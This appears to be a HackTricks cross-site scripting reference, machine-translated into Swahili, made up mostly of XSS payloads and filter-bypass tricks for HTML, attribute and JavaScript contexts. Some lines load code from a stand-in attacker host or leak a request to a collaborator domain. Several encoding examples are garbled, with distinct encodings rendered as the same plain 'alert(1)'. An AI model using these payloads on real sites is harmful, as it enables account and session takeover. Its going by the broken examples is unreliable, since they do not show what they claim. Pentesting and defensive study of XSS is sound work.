HackTricksXSS (Cross Site Scripting)
Reading time: 49 minutes
Methodology
- Angalia kama thamani yoyote unayodhibiti (parameta, njia, vichwa?, cookies?) inarudi katika HTML au inatumiwa na JS code.
- Pata muktadha ambapo inarudi/inatumika.
- Ikiwa inarudi
- Angalia ni alama zipi unaweza kutumia na kulingana na hiyo, andaa payload:
- Katika HTML safi:
- Je, unaweza kuunda vitambulisho vipya vya HTML?
- Je, unaweza kutumia matukio au sifa zinazounga mkono
javascript:protokali? - Je, unaweza kupita ulinzi?
- Je, maudhui ya HTML yanatafsiriwa na injini yoyote ya JS upande wa mteja (AngularJS, VueJS, Mavo...), unaweza kutumia Client Side Template Injection.
- Ikiwa huwezi kuunda vitambulisho vya HTML vinavyotekeleza JS code, unaweza kutumia Dangling Markup - HTML scriptless injection?
- Ndani ya HTML tag:
- Je, unaweza kutoka kwenye muktadha wa HTML safi?
- Je, unaweza kuunda matukio/mapitio mapya ili kutekeleza JS code?
- Je, sifa ambapo umekwama inasaidia utekelezaji wa JS?
- Je, unaweza kupita ulinzi?
- Ndani ya JavaScript code:
- Je, unaweza kutoroka
<script>tag? - Je, unaweza kutoroka mfuatano na kutekeleza JS code tofauti?
- Je, ingizo lako liko katika template literals ``?
- Je, unaweza kupita ulinzi?
- Javascript function inayo tekelezwa
- Unaweza kuashiria jina la kazi ya kutekeleza. e.g.:
?callback=alert(1) - Ikiwa inatumiwa:
- Unaweza kutumia DOM XSS, zingatia jinsi ingizo lako linavyodhibitiwa na ikiwa ingizo lako lililodhibitiwa linatumika na sink yoyote.
Unapofanya kazi kwenye XSS ngumu unaweza kupata ni ya kuvutia kujua kuhusu:
{{#ref}} debugging-client-side-js.md {{#endref}}
Reflected values
Ili kufanikiwa kutumia XSS jambo la kwanza unahitaji kupata ni thamani inayodhibitiwa na wewe inayorudi kwenye ukurasa wa wavuti.
- Inarudi kwa kati: Ikiwa unapata kwamba thamani ya parameta au hata njia inarudi kwenye ukurasa wa wavuti unaweza kutumia Reflected XSS.
- Ilihifadhiwa na kurudi: Ikiwa unapata kwamba thamani inayodhibitiwa na wewe imehifadhiwa kwenye seva na inarudi kila wakati unapoingia kwenye ukurasa unaweza kutumia Stored XSS.
- Inafikiwa kupitia JS: Ikiwa unapata kwamba thamani inayodhibitiwa na wewe inafikiwa kwa kutumia JS unaweza kutumia DOM XSS.
Contexts
Unapojaribu kutumia XSS jambo la kwanza unahitaji kujua ni wapi ingizo lako linaporudi. Kulingana na muktadha, utaweza kutekeleza JS code bila mipaka kwa njia tofauti.
Raw HTML
Ikiwa ingizo lako linarudi kwenye HTML safi ukurasa utahitaji kutumia baadhi ya HTML tag ili kutekeleza JS code: <img , <iframe , <svg , <script ... hizi ni baadhi tu ya vitambulisho vingi vya HTML ambavyo unaweza kutumia.
Pia, kumbuka Client Side Template Injection.
Ndani ya sifa za HTML tags
Ikiwa ingizo lako linarudi ndani ya thamani ya sifa ya tag unaweza kujaribu:
- Kutoroka kutoka kwenye sifa na kutoka kwenye tag (kisha utakuwa kwenye HTML safi) na kuunda vitambulisho vipya vya HTML ili kutumia:
"><img [...] - Ikiwa unaweza kutoroka kutoka kwenye sifa lakini si kutoka kwenye tag (
>imeandikwa au kufutwa), kulingana na tag unaweza kuunda tukio linalotekeleza JS code:" autofocus onfocus=alert(1) x=" - Ikiwa huwezi kutoroka kutoka kwenye sifa (
"inandikwa au kufutwa), kisha kulingana na sifa ipi thamani yako inarudi ndani ikiwa unadhibiti thamani yote au sehemu tu utaweza kuitumia. Kwa mfano, ikiwa unadhibiti tukio kamaonclick=utaweza kufanya itekeleze code isiyo na mipaka wakati inabonyezwa. Mfano mwingine wa kuvutia ni sifahref, ambapo unaweza kutumia protokali yajavascript:kutekeleza code isiyo na mipaka:href="javascript:alert(1)" - Ikiwa ingizo lako linarudi ndani ya "vitambulisho visivyoweza kutumika" unaweza kujaribu hila ya
accesskeykutumia udhaifu (utahitaji aina fulani ya uhandisi wa kijamii ili kutumia hii):" accesskey="x" onclick="alert(1)" x="
Mfano wa ajabu wa Angular inatekeleza XSS ikiwa unadhibiti jina la darasa:
html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
</div>
Ndani ya msimbo wa JavaScript
Katika kesi hii, ingizo lako linarejelewa kati ya <script> [...] </script> lebo za ukurasa wa HTML, ndani ya faili ya .js au ndani ya sifa kwa kutumia javascript: itifaki:
- Ikiwa inarejelewa kati ya
<script> [...] </script>lebo, hata kama ingizo lako liko ndani ya aina yoyote ya nukuu, unaweza kujaribu kuingiza</script>na kutoroka kutoka kwenye muktadha huu. Hii inafanya kazi kwa sababu ** kivinjari kitaanza kwanza kuchambua lebo za HTML** na kisha yaliyomo, kwa hivyo, hakitagundua kwamba lebo yako ya kuingiza</script>iko ndani ya msimbo wa HTML. - Ikiwa inarejelewa ndani ya mfuatano wa JS na hila ya mwisho haifanyi kazi, unahitaji kutoka kwenye mfuatano, kufanya msimbo wako na kurekebisha msimbo wa JS (ikiwa kuna kosa lolote, halitatekelezwa):
'-alert(1)-'';-alert(1)//\';alert(1)//- Ikiwa inarejelewa ndani ya template literals unaweza kuingiza maelekezo ya JS kwa kutumia sintaksia ya
${ ... }:var greetings = `Hello, ${alert(1)}` - Unicode encode inafanya kazi kuandika msimbo sahihi wa javascript:
javascript
alert(1)
alert(1)
alert(1)
Javascript Hoisting
Javascript Hoisting inahusisha fursa ya kutangaza kazi, mabadiliko au madarasa baada ya kutumika ili uweze kutumia hali ambapo XSS inatumia mabadiliko au kazi zisizotangazwa.
Angalia ukurasa ufuatao kwa maelezo zaidi:
{{#ref}} js-hoisting.md {{#endref}}
Javascript Function
Kurasa kadhaa za wavuti zina mwisho ambao zinakubali kama parameter jina la kazi ya kutekeleza. Mfano wa kawaida wa kuona katika mazingira halisi ni kitu kama: ?callback=callbackFunc.
Njia nzuri ya kugundua ikiwa kitu kilichotolewa moja kwa moja na mtumiaji kinajaribu kutekelezwa ni kubadilisha thamani ya param (kwa mfano kuwa 'Vulnerable') na kutazama kwenye console kwa makosa kama:
.png)
Ikiwa ni hatari, unaweza kuwa na uwezo wa kuanzisha tahadhari kwa kutuma tu thamani: ?callback=alert(1). Hata hivyo, ni kawaida sana kwamba mwisho huu uta thibitisha maudhui ili kuruhusu herufi, nambari, alama za nukta na viwango vya chini tu ([\w\._]).
Hata hivyo, hata na kikomo hicho bado inawezekana kufanya baadhi ya vitendo. Hii ni kwa sababu unaweza kutumia herufi hizo halali ili kufikia kipengele chochote katika DOM:
.png)
Baadhi ya kazi muhimu kwa hili:
firstElementChild
lastElementChild
nextElementSibiling
lastElementSibiling
parentElement
Unaweza pia kujaribu kuanzisha kazi za Javascript moja kwa moja: obj.sales.delOrders.
Hata hivyo, kawaida mwisho wa kutekeleza kazi iliyoonyeshwa ni mwisho bila DOM ya kuvutia sana, kurasa nyingine katika asili hiyo hiyo zitakuwa na DOM ya kuvutia zaidi ili kufanya vitendo zaidi.
Kwa hivyo, ili kutumia udhaifu huu katika DOM tofauti utekaji wa Same Origin Method Execution (SOME) ulitengenezwa:
{{#ref}} some-same-origin-method-execution.md {{#endref}}
DOM
Kuna kodhi ya JS inayotumia kwa njia isiyo salama baadhi ya data inayodhibitiwa na mshambuliaji kama location.href. Mshambuliaji, anaweza kutumia hii kutekeleza kodhi ya JS isiyo na mipaka.
{{#ref}} dom-xss.md {{#endref}}
Universal XSS
Aina hizi za XSS zinaweza kupatikana popote. Hazitegemei tu utekaji wa mteja wa programu ya wavuti bali katika muktadha wowote. Aina hizi za utekaji wa JavaScript isiyo na mipaka zinaweza hata kutumiwa kupata RCE, kusoma faili za kawaida katika wateja na seva, na zaidi.
Baadhi ya esemples:
{{#ref}} server-side-xss-dynamic-pdf.md {{#endref}}
{{#ref}} ../../network-services-pentesting/pentesting-web/electron-desktop-apps/ {{#endref}}
WAF bypass encoding image
.jpg)
Kuingiza ndani ya HTML safi
Wakati ingizo lako linarejelewa ndani ya ukurasa wa HTML au unaweza kutoroka na kuingiza kodhi ya HTML katika muktadha huu, kitu cha kwanza unahitaji kufanya ni kuangalia kama unaweza kutumia < kuunda lebo mpya: Jaribu tu kuonyesha ile herufi na uone kama inachukuliwa kama HTML au imeondolewa au ikiwa inarejelewa bila mabadiliko. Ni tu katika kesi ya mwisho ndipo utaweza kutumia kesi hii.
Kwa kesi hizi pia zingatia Client Side Template Injection.
Kumbuka: Maoni ya HTML yanaweza kufungwa kwa kutumia********-->****au ******--!>**
Katika kesi hii na ikiwa hakuna orodha nyeusi/nyeupe inayotumika, unaweza kutumia payloads kama:
html
<script>
alert(1)
</script>
<img src="x" onerror="alert(1)" />
<svg onload=alert('XSS')>
Lakini, ikiwa tags/attributes black/whitelisting inatumika, utahitaji kujaribu nguvu ambayo tags unaweza kuunda.
Mara tu unapokuwa umeweza kubaini ni tags zipi zinazoruhusiwa, utahitaji kujaribu nguvu attributes/events ndani ya tags zilizopatikana ili kuona jinsi unavyoweza kushambulia muktadha.
Tags/Events kujaribu nguvu
Nenda kwenye https://portswigger.net/web-security/cross-site-scripting/cheat-sheet na bonyeza Copy tags to clipboard. Kisha, tuma zote kwa kutumia Burp intruder na angalia ikiwa kuna tags yoyote ambayo haikugunduliwa kama mbaya na WAF. Mara tu unapokuwa umepata ni tags zipi unaweza kutumia, unaweza kujaribu nguvu matukio yote kwa kutumia tags halali (katika ukurasa huo huo bonyeza Copy events to clipboard na ufuate utaratibu sawa kama hapo awali).
Tags za kawaida
Ikiwa huja pata tag halali ya HTML, unaweza kujaribu kuunda tag ya kawaida na kutekeleza msimbo wa JS kwa kutumia attribute onfocus. Katika ombi la XSS, unahitaji kumaliza URL na # ili kufanya ukurasa uangalie kwenye kitu hicho na utekeleze msimbo:
/?search=<xss+id%3dx+onfocus%3dalert(document.cookie)+tabindex%3d1>#x
Blacklist Bypasses
Ikiwa aina fulani ya blacklist inatumika unaweza kujaribu kuipita kwa mbinu za kipumbavu:
javascript
//Random capitalization
<script> --> <ScrIpT>
<img --> <ImG
//Double tag, in case just the first match is removed
<script><script>
<scr<script>ipt>
<SCRscriptIPT>alert(1)</SCRscriptIPT>
//You can substitude the space to separate attributes for:
/
/*%00/
/%00*/
%2F
%0D
%0C
%0A
%09
//Unexpected parent tags
<svg><x><script>alert('1')</x>
//Unexpected weird attributes
<script x>
<script a="1234">
<script ~~~>
<script/random>alert(1)</script>
<script ///Note the newline
>alert(1)</script>
<scr\x00ipt>alert(1)</scr\x00ipt>
//Not closing tag, ending with " <" or " //"
<iframe SRC="javascript:alert('XSS');" <
<iframe SRC="javascript:alert('XSS');" //
//Extra open
<<script>alert("XSS");//<</script>
//Just weird an unexpected, use your imagination
<</script/script><script>
<input type=image src onerror="prompt(1)">
//Using `` instead of parenthesis
onerror=alert`1`
//Use more than one
<<TexTArEa/*%00//%00*/a="not"/*%00///AutOFocUs////onFoCUS=alert`1` //
Length bypass (small XSSs)
[!NOTE] > XSS ndogo zaidi kwa mazingira tofauti payload inaweza kupatikana hapa na hapa.
html
<!-- Taken from the blog of Jorge Lajara -->
<svg/onload=alert``> <script src=//aa.es> <script src=//℡㏛.pw>
The last one is using 2 unicode characters which expands to 5: telsr
More of these characters can be found here.
To check in which characters are decomposed check here.
Click XSS - Clickjacking
Ikiwa ili kutumia udhaifu huo unahitaji mtumiaji kubonyeza kiungo au fomu yenye data iliyojazwa awali unaweza kujaribu kudhulumu Clickjacking (ikiwa ukurasa una udhaifu).
Impossible - Dangling Markup
Ikiwa unafikiri tu kwamba haiwezekani kuunda tag ya HTML yenye sifa ya kutekeleza msimbo wa JS, unapaswa kuangalia Danglig Markup kwa sababu unaweza kutumia udhaifu huo bila kutekeleza msimbo wa JS.
Injecting inside HTML tag
Inside the tag/escaping from attribute value
Ikiwa uko ndani ya tag ya HTML, jambo la kwanza unaloweza kujaribu ni kutoroka kutoka kwa tag na kutumia baadhi ya mbinu zilizotajwa katika sehemu ya awali kutekeleza msimbo wa JS.
Ikiwa huwezi kutoroka kutoka kwa tag, unaweza kuunda sifa mpya ndani ya tag kujaribu kutekeleza msimbo wa JS, kwa mfano kutumia payload kama (kumbuka kwamba katika mfano huu nukuu mbili zinatumika kutoroka kutoka kwa sifa, hutahitaji hizo ikiwa ingizo lako linarejelewa moja kwa moja ndani ya tag):
bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
Matukio ya mtindo
python
<p style="animation: x;" onanimationstart="alert()">XSS</p>
<p style="animation: x;" onanimationend="alert()">XSS</p>
#ayload that injects an invisible overlay that will trigger a payload if anywhere on the page is clicked:
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.5);z-index: 5000;" onclick="alert(1)"></div>
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
Ndani ya sifa
Hata kama huwezi kutoroka kutoka kwa sifa (" inakodishwa au kufutwa), kulingana na sifa gani thamani yako inarudishwa ndani kama unadhibiti thamani yote au sehemu tu utaweza kuitumia vibaya. Kwa mfano, ikiwa unadhibiti tukio kama onclick= utaweza kufanya itekeleze msimbo wa kiholela inapobofya.
Mfano mwingine wa kuvutia ni sifa href, ambapo unaweza kutumia itifaki ya javascript: kutekeleza msimbo wa kiholela: href="javascript:alert(1)"
Kutoroka ndani ya tukio kwa kutumia uandishi wa HTML/URL encode
Herufi zilizokodishwa za HTML ndani ya thamani ya sifa za vitambulisho vya HTML zinatolewa wakati wa utekelezaji. Hivyo basi kitu kama ifuatavyo kitakuwa halali (mzigo uko kwenye maandiko makubwa): <a id="author" href="http://none" onclick="var tracker='http://foo?'-alert(1)-'';">Rudi Nyuma </a>
Kumbuka kwamba aina yoyote ya uandishi wa HTML ni halali:
javascript
//HTML entities
'-alert(1)-'
//HTML hex without zeros
'-alert(1)-'
//HTML hex with zeros
'-alert(1)-'
//HTML dec without zeros
'-alert(1)-'
//HTML dec with zeros
'-alert(1)-'
<a href="javascript:var a=''-alert(1)-''">a</a>
<a href="javascript:alert(2)">a</a>
<a href="javascript:alert(3)">a</a>
Kumbuka kwamba URL encode pia itafanya kazi:
python
<a href="https://example.com/lol%22onmouseover=%22prompt(1);%20img.png">Click</a>
Kupita ndani ya tukio kwa kutumia Unicode encode
javascript
//For some reason you can use unicode to encode "alert" but not "(1)"
<img src onerror=\u0061\u006C\u0065\u0072\u0074(1) />
<img src onerror=\u{61}\u{6C}\u{65}\u{72}\u{74}(1) />
Mipango Maalum Ndani ya sifa
Hapa unaweza kutumia mipango javascript: au data: katika baadhi ya maeneo ili kutekeleza msimbo wa JS wa kiholela. Baadhi zitahitaji mwingiliano wa mtumiaji na zingine hazitahitaji.
javascript
javascript:alert(1)
JavaSCript:alert(1)
javascript:%61%6c%65%72%74%28%31%29 //URL encode
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
java //Note the new line
script:alert(1)
data:text/html,<script>alert(1)</script>
DaTa:text/html,<script>alert(1)</script>
data:text/html;charset=iso-8859-7,%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
data:text/html;charset=UTF-8,<script>alert(1)</script>
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;charset=thing;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
Mahali ambapo unaweza kuingiza protokali hizi
Kwa ujumla protokali ya javascript: inaweza kutumika katika tag yoyote inayokubali sifa ya href na katika zaidi ya tag nyingi zinazokubali sifa ya src (lakini si <img>)
markup
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
<form action="javascript:alert(1)"><button>send</button></form>
<form id=x></form><button form="x" formaction="javascript:alert(1)">send</button>
<object data=javascript:alert(3)>
<iframe src=javascript:alert(2)>
<embed src=javascript:alert(1)>
<object data="data:text/html,<script>alert(5)</script>">
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+" type="image/svg+xml" AllowScriptAccess="always"></embed>
<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
<iframe src="data:text/html,<script>alert(5)</script>"></iframe>
//Special cases
<object data="//hacker.site/xss.swf"> .//https://github.com/evilcos/xss.swf
<embed code="//hacker.site/xss.swf" allowscriptaccess=always> //https://github.com/evilcos/xss.swf
<iframe srcdoc="<svg onload=alert(4);>">
Njia nyingine za kuficha
Katika kesi hii, usimbuaji wa HTML na hila ya usimbuaji wa Unicode kutoka sehemu iliyopita pia ni halali kwani uko ndani ya sifa.
javascript
<a href="javascript:var a=''-alert(1)-''">
Zaidi ya hayo, kuna njia nzuri nyingine kwa ajili ya kesi hizi: Hata kama ingizo lako ndani ya javascript:... linapokuwa limeandikwa kwa URL, litakuwa limeondolewa URL kabla ya kutekelezwa. Hivyo, ikiwa unahitaji kutoroka kutoka kwa nyuzi kwa kutumia nukta moja na unaona kwamba linapokuwa limeandikwa kwa URL, kumbuka kwamba haijalishi, litakuwa limefasiriwa kama nukta moja wakati wa wakati wa utekelezaji.
javascript
'-alert(1)-'
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
Kumbuka kwamba ikiwa utajaribu kutumia zote URLencode + HTMLencode kwa mpangilio wowote ili kuandika payload haitafanya kazi, lakini unaweza kuziunganisha ndani ya payload.
Kutumia Hex na Octal encode na javascript:
Unaweza kutumia Hex na Octal encode ndani ya sifa ya src ya iframe (angalau) kutangaza HTML tags za kutekeleza JS:
javascript
//Encoded: <svg onload=alert(1)>
// This WORKS
<iframe src=javascript:'\x3c\x73\x76\x67\x20\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x31\x29\x3e' />
<iframe src=javascript:'\74\163\166\147\40\157\156\154\157\141\144\75\141\154\145\162\164\50\61\51\76' />
//Encoded: alert(1)
// This doesn't work
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
Reverse tab nabbing
javascript
<a target="_blank" rel="opener"
Ikiwa unaweza kuingiza URL yoyote katika tag ya <a href= isiyo na mpangilio ambayo ina sifa za target="_blank" na rel="opener", angalia ukurasa ufuatao ili kutumia tabia hii:
{{#ref}} ../reverse-tab-nabbing.md {{#endref}}
juu ya Kuepuka Wakati wa Matukio
Kwanza kabisa angalia ukurasa huu (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) kwa "on" event handlers zinazofaa.
Ikiwa kuna orodha ya mblacklist inayokuzuia kuunda hizi hata handlers unaweza kujaribu kuepuka zifuatazo:
javascript
<svg onload%09=alert(1)> //No safari
<svg %09onload=alert(1)>
<svg %09onload%20=alert(1)>
<svg onload%09%20%28%2c%3b=alert(1)>
//chars allowed between the onevent and the "="
IExplorer: %09 %0B %0C %020 %3B
Chrome: %09 %20 %28 %2C %3B
Safari: %2C %3B
Firefox: %09 %20 %28 %2C %3B
Opera: %09 %20 %2C %3B
Android: %09 %20 %28 %2C %3B
XSS katika "Madaraja Yasiyoweza Kutumika" (ingizo lililofichwa, kiungo, kanuni, meta)
Kutoka hapa sasa inawezekana kutumia vibaya ingizo lililofichwa na:
html
<button popvertarget="x">Click me</button>
<input type="hidden" value="y" popover id="x" onbeforetoggle="alert(1)" />
Na katika meta tags:
html
<!-- Injection inside meta attribute-->
<meta
name="apple-mobile-web-app-title"
content=""
Twitter
popover
id="newsletter"
onbeforetoggle="alert(2)" />
<!-- Existing target-->
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
Kutoka hapa: Unaweza kutekeleza XSS payload ndani ya sifa iliyofichwa, ikiwa unaweza kushawishi mhasiriwa kubonyeza mchanganyiko wa funguo. Kwenye Firefox Windows/Linux mchanganyiko wa funguo ni ALT+SHIFT+X na kwenye OS X ni CTRL+ALT+X. Unaweza kubaini mchanganyiko tofauti wa funguo kwa kutumia funguo tofauti katika sifa ya ufikiaji. Hapa kuna vector:
markup
<input type="hidden" accesskey="X" onclick="alert(1)">
Mchango wa XSS utakuwa kama ifuatavyo: " accesskey="x" onclick="alert(1)" x="
Kupita kwenye Orodha ya Blacklist
Njia kadhaa za kutumia uandishi tofauti zimeonyeshwa tayari ndani ya sehemu hii. Rudi kujifunza wapi unaweza kutumia:
- Uandishi wa HTML (HTML tags)
- Uandishi wa Unicode (unaweza kuwa ni msimbo halali wa JS):
\u0061lert(1) - Uandishi wa URL
- Uandishi wa Hex na Octal
- Uandishi wa data
Kupita kwa HTML tags na sifa
Soma Kupita kwenye Orodha ya Blacklist ya sehemu ya awali.
Kupita kwa msimbo wa JavaScript
Soma orodha ya kupita ya JavaScript ya sehemu ifuatayo.
CSS-Gadgets
Ikiwa umepata XSS katika sehemu ndogo sana ya wavuti inayohitaji aina fulani ya mwingiliano (labda kiungo kidogo kwenye footer chenye kipengele cha onmouseover), unaweza kujaribu kubadilisha nafasi ambayo kipengele hicho kinachukua ili kuongeza uwezekano wa kiungo hicho kufunguliwa.
Kwa mfano, unaweza kuongeza mtindo katika kipengele kama: position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5
Lakini, ikiwa WAF inachuja sifa ya mtindo, unaweza kutumia CSS Styling Gadgets, hivyo ikiwa unapata, kwa mfano
.test {display:block; color: blue; width: 100%}
na
#someid {top: 0; font-family: Tahoma;}
Sasa unaweza kubadilisha kiungo chetu na kukileta katika mfumo
<a href="" id=someid class=test onclick=alert() a="">
Hila hii ilichukuliwa kutoka https://medium.com/@skavans_/improving-the-impact-of-a-mouse-related-xss-with-styling-and-css-gadgets-b1e5dec2f703
Kuingiza ndani ya msimbo wa JavaScript
Katika kesi hizi ingizo lako litakuwa limeakisiwa ndani ya msimbo wa JS wa faili ya .js au kati ya lebo za <script>...</script> au kati ya matukio ya HTML ambayo yanaweza kutekeleza msimbo wa JS au kati ya sifa zinazokubali itifaki ya javascript:.
Kutoroka lebo ya <script>
Ikiwa msimbo wako umeingizwa ndani ya <script> [...] var input = 'reflected data' [...] </script> unaweza kwa urahisi kutoroka kufunga lebo ya <script>:
javascript
</script><img src=1 onerror=alert(document.domain)>
Kumbuka kwamba katika mfano huu hatujaifunga hata nukta moja. Hii ni kwa sababu uchambuzi wa HTML unafanywa kwanza na kivinjari, ambayo inahusisha kutambua vipengele vya ukurasa, ikiwa ni pamoja na vizuizi vya script. Uchambuzi wa JavaScript ili kuelewa na kutekeleza scripts zilizowekwa unafanywa tu baadaye.
Ndani ya msimbo wa JS
Ikiwa <> zinatakaswa unaweza bado kuepuka mfuatano ambapo ingizo lako lina patikana na kutekeleza JS isiyo na mpangilio. Ni muhimu kurekebisha sintaksia ya JS, kwa sababu ikiwa kuna makosa yoyote, msimbo wa JS hautatekelezwa:
'-alert(document.domain)-'
';alert(document.domain)//
\';alert(document.domain)//
Template literals ``
Ili kujenga nyuzi mbali na nukta moja na mbili, JS pia inakubali backticks ``. Hii inajulikana kama template literals kwani inaruhusu kuingiza maelekezo ya JS kwa kutumia sintaksia ${ ... }.
Hivyo, ikiwa unapata kuwa ingizo lako linatolewa ndani ya nyuzi ya JS inayotumia backticks, unaweza kutumia sintaksia ${ ... } kutekeleza kodhi ya JS isiyo na mipaka:
Hii inaweza kutumiwa vibaya kwa kutumia:
javascript
;`${alert(1)}``${`${`${`${alert(1)}`}`}`}`
javascript
// This is valid JS code, because each time the function returns itself it's recalled with ``
function loop() {
return loop
}
loop``````````````
Utekelezaji wa msimbo uliokodishwa
markup
<script>\u0061lert(1)</script>
<svg><script>alert('1')
<svg><script>alert(1)</script></svg> <!-- The svg tags are neccesary
<iframe srcdoc="<SCRIPT>alert(1)</iframe>">
Unicode Encode JS execution
javascript
alert(1)
alert(1)
alert(1)
Mbinu za kupita orodha za mblacklist za JavaScript
Mifumo ya maandiko
javascript
"thisisastring"
'thisisastrig'
`thisisastring`
/thisisastring/ == "/thisisastring/"
/thisisastring/.source == "thisisastring"
"\h\e\l\l\o"
String.fromCharCode(116,104,105,115,105,115,97,115,116,114,105,110,103)
"\x74\x68\x69\x73\x69\x73\x61\x73\x74\x72\x69\x6e\x67"
"\164\150\151\163\151\163\141\163\164\162\151\156\147"
"\u0074\u0068\u0069\u0073\u0069\u0073\u0061\u0073\u0074\u0072\u0069\u006e\u0067"
"\u{74}\u{68}\u{69}\u{73}\u{69}\u{73}\u{61}\u{73}\u{74}\u{72}\u{69}\u{6e}\u{67}"
"\a\l\ert\(1\)"
atob("dGhpc2lzYXN0cmluZw==")
eval(8680439..toString(30))(983801..toString(36))
Mikato maalum
javascript
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
"\b" //backspace
"\f" //form feed
"\n" //new line
"\r" //carriage return
"\t" //tab
// Any other char escaped is just itself
Mabadiliko ya nafasi ndani ya msimbo wa JS
javascript
<TAB>
/**/
Maoni ya JavaScript (kutoka Maoni ya JavaScript hila)
javascript
//This is a 1 line comment
/* This is a multiline comment*/
<!--This is a 1line comment
#!This is a 1 line comment, but "#!" must to be at the beggining of the first line
-->This is a 1 line comment, but "-->" must to be at the beggining of the first line
Mstari mipya ya JavaScript (kutoka hila ya mstari mpya wa JavaScript )
javascript
//Javascript interpret as new line these chars:
String.fromCharCode(10)
alert("//\nalert(1)") //0x0a
String.fromCharCode(13)
alert("//\ralert(1)") //0x0d
String.fromCharCode(8232)
alert("//\u2028alert(1)") //0xe2 0x80 0xa8
String.fromCharCode(8233)
alert("//\u2029alert(1)") //0xe2 0x80 0xa9
JavaScript nafasi za wazi
javascript
log=[];
function funct(){}
for(let i=0;i<=0x10ffff;i++){
try{
eval(`funct${String.fromCodePoint(i)}()`);
log.push(i);
}
catch(e){}
}
console.log(log)
//9,10,11,12,13,32,160,5760,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8232,8233,8239,8287,12288,65279
//Either the raw characters can be used or you can HTML encode them if they appear in SVG or HTML attributes:
<img/src/onerror=alert(1)>
Javascript ndani ya maoni
javascript
//If you can only inject inside a JS comment, you can still leak something
//If the user opens DevTools request to the indicated sourceMappingURL will be send
//# sourceMappingURL=https://evdr12qyinbtbd29yju31993gumlaby0.oastify.com
JavaScript bila mabano
`javascript
// By setting location
window.location='javascript:alert\x281\x29'
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
// Backtips
// Backtips pass the string as an array of lenght 1
alert`1`
// Backtips + Tagged Templates + call/apply
eval`alert\x281\x29` // This won't work as it will just return the passed array
setTimeout`alert\x281\x29`
eval.call`${'alert\x281\x29'}`
eval.apply`${[`alert\x281\x29`]}`
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
// To pass several arguments you can use
function btt(){
console.log(arguments);
}
btt`${'arg1'}${'arg2'}${'arg3'}`
//It's possible to construct a function and call it
Function`x${'alert(1337)'}x```
// .replace can use regexes and call a function if something is found
"a,".replace`a${alert}` //Initial ["a"] is passed to str as "a," and thats why the initial string is "a,"
"a".replace.call`1${/./}${alert}`
// This happened in the previous example
// Change "this" value of call to "1,"
// match anything with regex /./
// call alert with "1"
"a".replace.call`1337${/..../}${alert}` //alert with 1337 instead
// Using Reflect.apply to call any function with any argumnets
Reflect.apply.call`${alert}${window}${[1337]}` //Pass the function to call (“alert”), then the “this” value to that function (“window”) which avoids the illegal invocation error and finally an array of arguments to pass to the function.
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
// Using Reflect.set to call set any value to a variable
Reflect.set.call`${location}${'href'}${'javascript:alert\x281337\x29'}` // It requires a valid object in the first argument (“location”), a property in the second argument and a value to assign in the third.
// valueOf, toString
// These operations are called when the object is used as a primitive
// Because the objet is passed as "this" and alert() needs "window" to be the value of "this", "window" methods are used
valueOf=alert;window+''
toString=alert;window+''
// Error handler
window.onerror=eval;throw"=alert\x281\x29";
onerror=eval;throw"=alert\x281\x29";
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
{onerror=eval}throw"=alert(1)" //No ";"
onerror=alert //No ";" using new line
throw 1337
// Error handler + Special unicode separators
eval("onerror=\u2028alert\u2029throw 1337");
